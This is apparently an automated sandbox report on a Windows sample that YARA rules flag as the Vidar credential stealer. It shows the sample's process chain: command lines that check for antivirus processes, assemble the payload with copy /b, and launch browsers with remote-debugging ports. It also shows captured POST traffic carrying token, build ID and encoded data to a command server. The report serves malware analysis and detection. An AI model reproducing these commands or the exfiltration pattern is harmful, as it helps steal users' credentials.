------TJ5X4EUSR1NYMY5FC2VS
Content-Disposition: form-data; name="token"

259654c3bcc7330e1954cafd3454ec44
------TJ5X4EUSR1NYMY5FC2VS
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------TJ5X4EUSR1NYMY5FC2VS
Cont
                                                                                                                                                                                                                                                                                                        Data Ascii: pxdmmNSls9jHbVr9JMNZllU4O1Tyf8MYqZtYmUt/oEpAXcMDrWvgegxRgeg46VshGDLrV24hMFlICxG4MOgrcXJUE9xTsDGOPyoA4pgJSZp9JigDk7g/8XLsv+vRv6111cfenb8SbH/r0b+tdP5h9aALORTfxqDzPek3mgCc9aSod5o8w0ASEmmmozIaTdQA+kJFMJNMLUAPLUwmmF6N1ADs00mmlqaWoAcTTSaaTRnigBc02kzSZoAUmm5pCaT
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:48 UTC16355OUTData Raw: 62 49 78 42 4f 4e 78 50 4a 78 6e 6a 50 51 64 4b 35 71 34 73 45 66 79 78 4e 6f 31 33 4a 72 69 36 74 48 4a 4c 64 69 31 63 35 69 2b 30 41 67 2b 62 6a 42 51 4a 74 2b 58 4a 78 6a 6f 4e 75 51 66 61 53 44 70 63 39 45 71 43 30 76 49 4c 36 45 7a 57 30 6d 2b 4d 4f 38 5a 4f 43 50 6d 56 69 72 44 6e 30 49 49 72 68 6c 74 35 70 2f 47 46 6e 64 4a 70 51 67 6b 2b 33 53 72 63 46 64 4e 6c 44 6d 50 5a 49 75 58 75 53 64 72 71 33 79 6b 4b 42 67 5a 55 5a 34 35 62 46 59 57 2b 6e 36 4a 4c 59 4c 6f 4b 4b 57 31 47 58 37 51 58 30 75 53 61 4e 55 33 79 4e 47 78 6a 51 44 7a 6c 78 74 41 77 53 46 79 44 78 6a 46 48 53 34 33 76 62 2b 75 76 38 41 6b 65 68 55 56 7a 2f 67 75 47 65 33 38 4f 72 44 50 45 30 57 79 34 6e 38 74 47 68 61 45 42 50 4d 59 72 68 47 4a 4b 72 6a 47 42 6b 34 47 4b 36 43 68
                                                                                                                                                                                                                                                                                                        Data Ascii: bIxBONxPJxnjPQdK5q4sEfyxNo13Jri6tHJLdi1c5i+0Ag+bjBQJt+XJxjoNuQfaSDpc9EqC0vIL6EzW0m+MO8ZOCPmVirDn0IIrhlt5p/GFndJpQgk+3SrcFdNlDmPZIuXuSdrq3ykKBgZUZ45bFYW+n6JLYLoKKW1GX7QX0uSaNU3yNGxjQDzlxtAwSFyDxjFHS43vb+uv8AkehUVz/guGe38OrDPE0Wy4n8tGhaEBPMYrhGJKrjGBk4GK6Ch
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:48 UTC199OUTData Raw: 74 35 58 68 6d 69 63 50 48 4a 47 78 56 6b 59 48 49 49 49 35 42 42 37 31 30 74 6a 34 38 31 58 4c 77 61 2f 4c 50 34 67 30 36 51 44 66 5a 36 68 63 75 34 44 44 37 72 49 78 4a 4b 4d 44 33 48 55 45 67 39 61 35 61 69 69 77 48 51 61 68 34 33 38 53 36 6a 35 38 63 6d 74 58 73 56 72 4d 70 6a 4e 6e 62 7a 76 48 62 72 47 52 6a 79 31 6a 42 32 68 63 63 59 78 30 72 6e 36 4b 4b 59 42 56 79 54 2f 41 4a 41 74 72 2f 31 38 54 66 38 41 6f 4d 64 55 36 75 53 66 38 67 57 31 2f 77 43 76 69 62 2f 30 47 4f 67 44 2f 39 6b 3d 0d 0a 2d 2d 2d 2d 2d 2d 54 4a 35 58 34 45 55 53 52 31 4e 59 4d 59 35 46 43 32 56 53 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: t5XhmicPHJGxVkYHIII5BB710tj481XLwa/LP4g06QDfZ6hcu4DD7rIxJKMD3HUEg9a5aiiwHQah438S6j58cmtXsVrMpjNnbzvHbrGRjy1jB2hccYx0rn6KKYBVyT/AJAtr/18Tf8AoMdU6uSf8gW1/wCvib/0GOgD/9k=------TJ5X4EUSR1NYMY5FC2VS--
2024-12-24 18:28:50 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Dec 2024 18:28:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-24 18:28:50 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.6 | 50107 | 188.245.216.205 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com

Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:51 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----8YMYM7YUK6FUAIWTJEUK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-24 18:28:51 UTC | 331 | OUT | Data Ascii: ------8YMYM7YUK6FUAIWTJEUKContent-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------8YMYM7YUK6FUAIWTJEUKContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------8YMYM7YUK6FUAIWTJEUKCont
2024-12-24 18:28:52 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Dec 2024 18:28:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-24 18:28:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
51 | 192.168.2.6 | 50110 | 20.198.119.84 | 443

Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:53 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: Y/Nvqp64g02yvptr.1Context: 4edbcbebbf465365
2024-12-24 18:28:53 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-24 18:28:53 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: Y/Nvqp64g02yvptr.2Context: 4edbcbebbf465365<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAf3cLYZtWUCJqAc2SXUhfpjZ3f6eSFKdlmhd31um7/s3GQY4y3bJj4qzBr94niuQ9KKaRDJavxvn7uQe6CrSt1vFQmMBmYHbGhV8KqJ5ZdMyrp
2024-12-24 18:28:53 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: Y/Nvqp64g02yvptr.3Context: 4edbcbebbf465365<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-24 18:28:54 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2024-12-24 18:28:54 UTC | 58 | IN | Data Ascii: MS-CV: 1LomOk6Q/EWD4VnSBOILRQ.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.6 | 50117 | 188.245.216.205 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com

Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:54 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----MY58GDTJM7GVAAAIE3WB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-24 18:28:54 UTC | 331 | OUT | Data Ascii: ------MY58GDTJM7GVAAAIE3WBContent-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------MY58GDTJM7GVAAAIE3WBContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------MY58GDTJM7GVAAAIE3WBCont
2024-12-24 18:28:55 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Dec 2024 18:28:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-24 18:28:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0



                                                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                                                        Start time:13:26:53
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\PodcastsTries.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\PodcastsTries.exe"
                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                        File size:1'259'108 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:20BEF33E4A0ADD922AE043E2AED13EA2
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                                                                                        Start time:13:26:54
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c move Assessing Assessing.cmd & Assessing.cmd
                                                                                                                                                                                                                                                                                                        Imagebase:0x1c0000
                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                                                                                        Start time:13:26:54
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                                                                                        Start time:13:26:54
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:tasklist
                                                                                                                                                                                                                                                                                                        Imagebase:0xda0000
                                                                                                                                                                                                                                                                                                        File size:79'360 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                                                                                        Start time:13:26:54
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                                                                        Imagebase:0x2b0000
                                                                                                                                                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                                                                                        Start time:13:26:55
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:tasklist
                                                                                                                                                                                                                                                                                                        Imagebase:0xda0000
                                                                                                                                                                                                                                                                                                        File size:79'360 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                                                                                        Start time:13:26:55
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                                                                        Imagebase:0x2b0000
                                                                                                                                                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                                                                                        Start time:13:26:56
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:cmd /c md 680662
                                                                                                                                                                                                                                                                                                        Imagebase:0x1c0000
                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                                                                                        Start time:13:26:56
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:extrac32 /Y /E Memo
                                                                                                                                                                                                                                                                                                        Imagebase:0x910000
                                                                                                                                                                                                                                                                                                        File size:29'184 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                                                                                        Start time:13:26:56
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:findstr /V "OBTAINING" Compensation
                                                                                                                                                                                                                                                                                                        Imagebase:0x2b0000
                                                                                                                                                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                                                                                        Start time:13:26:56
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:cmd /c copy /b ..\Honey + ..\Biotechnology + ..\Enzyme + ..\Harvard T
                                                                                                                                                                                                                                                                                                        Imagebase:0x1c0000
                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                                                                                        Start time:13:26:57
                                                                                                                                                                                                                                                                                                        Start date:24/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:Billion.com T
                                                                                                                                                                                                                                                                                                        Imagebase:0x130000
                                                                                                                                                                                                                                                                                                        File size:947'288 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.3329936932.0000000004391000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3329936932.0000000004391000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2541281715.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2540896451.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2540939282.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.3327789976.0000000004110000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3329936932.000000000446D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2541052285.0000000004391000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.3327625585.0000000004090000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3327625585.0000000004090000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                                        Has exited:true

Target ID:13
Start time:13:26:57
Start date:24/12/2024
Path:C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):true
Commandline:choice /d y /t 5
Imagebase:0x470000
File size:28'160 bytes
MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:13:27:53
Start date:24/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:0x7ff684c40000
File size:3'242'272 bytes
MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:13:27:54
Start date:24/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 --field-trial-handle=2236,i,6734849523328560890,2082883044191278633,262144 /prefetch:8
Imagebase:0x7ff684c40000
File size:3'242'272 bytes
MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:13:28:07
Start date:24/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:13:28:08
Start date:24/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2704 --field-trial-handle=2644,i,11626362328839299317,9747645851488831929,262144 /prefetch:3
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:13:28:08
Start date:24/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:13:28:09
Start date:24/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2052,i,17749502471063055911,16474361137930384879,262144 /prefetch:3
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:13:28:18
Start date:24/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:13:28:19
Start date:24/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2412,i,5564331809908688110,6573540988472131423,262144 /prefetch:3
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:13:28:19
Start date:24/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:28
Start time:13:28:19
Start date:24/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:3
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:30
Start time:13:28:23
Start date:24/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6356 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:32
Start time:13:28:23
Start date:24/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6704 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
